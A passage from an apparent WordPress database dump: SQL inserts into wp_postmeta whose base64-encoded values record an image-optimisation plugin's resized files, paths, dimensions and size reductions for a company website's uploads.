vbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3hhdXRoMi1lMTQ3MTU3MTYyNTM5NC0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveGF1dGgyLWUxNDcxNTcxNjI1Mzk0LTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94YXV0aDItZTE0NzE1NzE2MjUzOTQtMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjMsInRpbWUiOjE0ODM1ODYwMjgsImlkIjo1NTR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3hhdXRoMi1lMTQ3MTU3MTYyNTM5NC0xODB4MTMzLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveGF1dGgyLWUxNDcxNTcxNjI1Mzk0LTE4MHgxMzMuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxMzMiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94YXV0aDItZTE0NzE1NzE2MjUzOTQtMTgweDEzMy5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODYwMzAsImlkIjo1NTR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3hhdXRoMi1lMTQ3MTU3MTYyNTM5NC0yNDd4MTMzLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveGF1dGgyLWUxNDcxNTcxNjI1Mzk0LTI0N3gxMzMuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIxMzMiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94YXV0aDItZTE0NzE1NzE2MjUzOTQtMjQ3eDEzMy5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODYwMzIsImlkIjo1NTR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3hhdXRoMi1lMTQ3MTU3MTYyNTM5NC0zMDB4MTMzLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveGF1dGgyLWUxNDcxNTcxNjI1Mzk0LTMwMHgxMzMuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIxMzMiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94YXV0aDItZTE0NzE1NzE2MjUzOTQtMzAweDEzMy5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODYwMzQsImlkIjo1NTR9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30169, 549, 'wpfc_optimisation_reduction', '902'); 
INSERT INTO `wp_postmeta` VALUES (30170, 549, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvS1JZVE9YX0FVVEhPUklaRUQtZTE0NzE1Njc4MTA5ODEuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9LUllUT1hfQVVUSE9SSVpFRC1lMTQ3MTU2NzgxMDk4MS5qcGciLCJ3aWR0aCI6Mjg4LCJoZWlnaHQiOjExNywibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0tSWVRPWF9BVVRIT1JJWkVELWUxNDcxNTY3ODEwOTgxLmpwZyIsInJlZHVjdGlvbiI6Nzg1LCJ0aW1lIjoxNDgzNTg2MDQxLCJpZCI6IjU0OSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvS1JZVE9YX0FVVEhPUklaRUQtZTE0NzE1Njc4MTA5ODEtMjUweDExNy5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjExNywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9LUllUT1hfQVVUSE9SSVpFRC1lMTQ3MTU2NzgxMDk4MS0yNTB4MTE3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0tSWVRPWF9BVVRIT1JJWkVELWUxNDcxNTY3ODEwOTgxLTI1MHgxMTcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg2MDQzLCJpZCI6NTQ5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0tSWVRPWF9BVVRIT1JJWkVELWUxNDcxNTY3ODEwOTgxLTIwMHgxMTcuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoxMTcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvS1JZVE9YX0FVVEhPUklaRUQtZTE0NzE1Njc4MTA5ODEtMjAweDExNy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9LUllUT1hfQVVUSE9SSVpFRC1lMTQ3MTU2NzgxMDk4MS0yMDB4MTE3LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NjA0NSwiaWQiOjU0OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9LUllUT1hfQVVUSE9SSVpFRC1lMTQ3MTU2NzgxMDk4MS0yMjV4MTE3LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MTE3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0tSWVRPWF9BVVRIT1JJWkVELWUxNDcxNTY3ODEwOTgxLTIyNXgxMTcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvS1JZVE9YX0FVVEhPUklaRUQtZTE0NzE1Njc4MTA5ODEtMjI1eDExNy5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODYwNDcsImlkIjo1NDl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9LUllUT1hfQVVUSE9SSVpFRC1lMTQ3MTU2NzgxMDk4MS0xMTR4MTE3LmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0tSWVRPWF9BVVRIT1JJWkVELWUxNDcxNTY3ODEwOTgxLTExNHgxMTcuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMTciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvS1JZVE9YX0FVVEhPUklaRUQtZTE0NzE1Njc4MTA5ODEtMTE0eDExNy5qcGciLCJyZWR1Y3Rpb24iOjExMiwidGltZSI6MTQ4MzU4NjA0OSwiaWQiOjU0OX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0tSWVRPWF9BVVRIT1JJWkVELWUxNDcxNTY3ODEwOTgxLTE4MHgxMTcuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvS1JZVE9YX0FVVEhPUklaRUQtZTE0NzE1Njc4MTA5ODEtMTgweDExNy5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjExNyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9LUllUT1hfQVVUSE9SSVpFRC1lMTQ3MTU2NzgxMDk4MS0xODB4MTE3LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NjA1MSwiaWQiOjU0OX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0tSWVRPWF9BVVRIT1JJWkVELWUxNDcxNTY3ODEwOTgxLTI0N3gxMTcuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvS1JZVE9YX0FVVEhPUklaRUQtZTE0NzE1Njc4MTA5ODEtMjQ3eDExNy5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjExNyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9LUllUT1hfQVVUSE9SSVpFRC1lMTQ3MTU2NzgxMDk4MS0yNDd4MTE3LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NjA1MywiaWQiOjU0OX1d'); 
INSERT INTO `wp_postmeta` VALUES (30171, 546, 'wpfc_optimisation_reduction', '2029'); 
INSERT INTO `wp_postmeta` VALUES (30172, 546, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2hlbW91cnNibGFja3doaXRlLTEtZTE0NzE1NjcwNjY1MjIuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jaGVtb3Vyc2JsYWNrd2hpdGUtMS1lMTQ3MTU2NzA2NjUyMi5qcGciLCJ3aWR0aCI6Mzg2LCJoZWlnaHQiOjEyNCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NoZW1vdXJzYmxhY2t3aGl0ZS0xLWUxNDcxNTY3MDY2NTIyLmpwZyIsInJlZHVjdGlvbiI6MTA1NiwidGltZSI6MTQ4MzU4NjA2MCwiaWQiOiI1NDYifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NoZW1vdXJzYmxhY2t3aGl0ZS0xLWUxNDcxNTY3MDY2NTIyLTM0MHgxMjQuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjoxMjQsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2hlbW91cnNibGFja3doaXRlLTEtZTE0NzE1NjcwNjY1MjItMzQweDEyNC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jaGVtb3Vyc2JsYWNrd2hpdGUtMS1lMTQ3MTU2NzA2NjUyMi0zNDB4MTI0LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NjA2MiwiaWQiOjU0Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jaGVtb3Vyc2JsYWNrd2hpdGUtMS1lMTQ3MTU2NzA2NjUyMi0yNTB4MTI0LmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MTI0LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NoZW1vdXJzYmxhY2t3aGl0ZS0xLWUxNDcxNTY3MDY2NTIyLTI1MHgxMjQuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2hlbW91cnNibGFja3doaXRlLTEtZTE0NzE1NjcwNjY1MjItMjUweDEyNC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODYwNjQsImlkIjo1NDZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2hlbW91cnNibGFja3doaXRlLTEtZTE0NzE1NjcwNjY1MjItMjAweDEyNC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjEyNCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jaGVtb3Vyc2JsYWNrd2hpdGUtMS1lMTQ3MTU2NzA2NjUyMi0yMDB4MTI0LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NoZW1vdXJzYmxhY2t3aGl0ZS0xLWUxNDcxNTY3MDY2NTIyLTIwMHgxMjQuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg2MDY2LCJpZCI6NTQ2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NoZW1vdXJzYmxhY2t3aGl0ZS0xLWUxNDcxNTY3MDY2NTIyLTIyNXgxMjQuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoxMjQsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2hlbW91cnNibGFja3doaXRlLTEtZTE0NzE1NjcwNjY1MjItMjI1eDEyNC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jaGVtb3Vyc2JsYWNrd2hpdGUtMS1lMTQ3MTU2NzA2NjUyMi0yMjV4MTI0LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NjA2OCwiaWQiOjU0Nn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NoZW1vdXJzYmxhY2t3aGl0ZS0xLWUxNDcxNTY3MDY2NTIyLTExNHgxMjQuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2hlbW91cnNibGFja3doaXRlLTEtZTE0NzE1NjcwNjY1MjItMTE0eDEyNC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEyNCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jaGVtb3Vyc2JsYWNrd2hpdGUtMS1lMTQ3MTU2NzA2NjUyMi0xMTR4MTI0LmpwZyIsInJlZHVjdGlvbiI6NjEzLCJ0aW1lIjoxNDgzNTg2MDcwLCJpZCI6NTQ2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2hlbW91cnNibGFja3doaXRlLTEtZTE0NzE1NjcwNjY1MjItMTgweDEyNC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jaGVtb3Vyc2JsYWNrd2hpdGUtMS1lMTQ3MTU2NzA2NjUyMi0xODB4MTI0LmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTI0IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NoZW1vdXJzYmxhY2t3aGl0ZS0xLWUxNDcxNTY3MDY2NTIyLTE4MHgxMjQuanBnIiwicmVkdWN0aW9uIjozNTQsInRpbWUiOjE0ODM1ODYwNzMsImlkIjo1NDZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jaGVtb3Vyc2JsYWNrd2hpdGUtMS1lMTQ3MTU2NzA2NjUyMi0yNDd4MTI0LmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NoZW1vdXJzYmxhY2t3aGl0ZS0xLWUxNDcxNTY3MDY2NTIyLTI0N3gxMjQuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIxMjQiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2hlbW91cnNibGFja3doaXRlLTEtZTE0NzE1NjcwNjY1MjItMjQ3eDEyNC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODYwNzUsImlkIjo1NDZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jaGVtb3Vyc2JsYWNrd2hpdGUtMS1lMTQ3MTU2NzA2NjUyMi0zMDB4MTI0LmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NoZW1vdXJzYmxhY2t3aGl0ZS0xLWUxNDcxNTY3MDY2NTIyLTMwMHgxMjQuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIxMjQiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2hlbW91cnNibGFja3doaXRlLTEtZTE0NzE1NjcwNjY1MjItMzAweDEyNC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODYwNzcsImlkIjo1NDZ9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30173, 544, 'wpfc_optimisation_reduction', '2042'); 
INSERT INTO `wp_postmeta` VALUES (30174, 544, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2hlbW91cnNibGFja3doaXRlLWUxNDcxNTY2OTczNzAwLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2hlbW91cnNibGFja3doaXRlLWUxNDcxNTY2OTczNzAwLmpwZyIsIndpZHRoIjozODYsImhlaWdodCI6MTI0LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2hlbW91cnNibGFja3doaXRlLWUxNDcxNTY2OTczNzAwLmpwZyIsInJlZHVjdGlvbiI6MTA3NiwidGltZSI6MTQ4MzU4NjA4MywiaWQiOiI1NDQifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NoZW1vdXJzYmxhY2t3aGl0ZS1lMTQ3MTU2Njk3MzcwMC0zNDB4MTI0LmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MTI0LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NoZW1vdXJzYmxhY2t3aGl0ZS1lMTQ3MTU2Njk3MzcwMC0zNDB4MTI0LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NoZW1vdXJzYmxhY2t3aGl0ZS1lMTQ3MTU2Njk3MzcwMC0zNDB4MTI0LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NjA4NSwiaWQiOjU0NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jaGVtb3Vyc2JsYWNrd2hpdGUtZTE0NzE1NjY5NzM3MDAtMjUweDEyNC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjEyNCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jaGVtb3Vyc2JsYWNrd2hpdGUtZTE0NzE1NjY5NzM3MDAtMjUweDEyNC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jaGVtb3Vyc2JsYWNrd2hpdGUtZTE0NzE1NjY5NzM3MDAtMjUweDEyNC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODYwODcsImlkIjo1NDR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2hlbW91cnNibGFja3doaXRlLWUxNDcxNTY2OTczNzAwLTIwMHgxMjQuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoxMjQsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2hlbW91cnNibGFja3doaXRlLWUxNDcxNTY2OTczNzAwLTIwMHgxMjQuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2hlbW91cnNibGFja3doaXRlLWUxNDcxNTY2OTczNzAwLTIwMHgxMjQuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg2MDg5LCJpZCI6NTQ0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1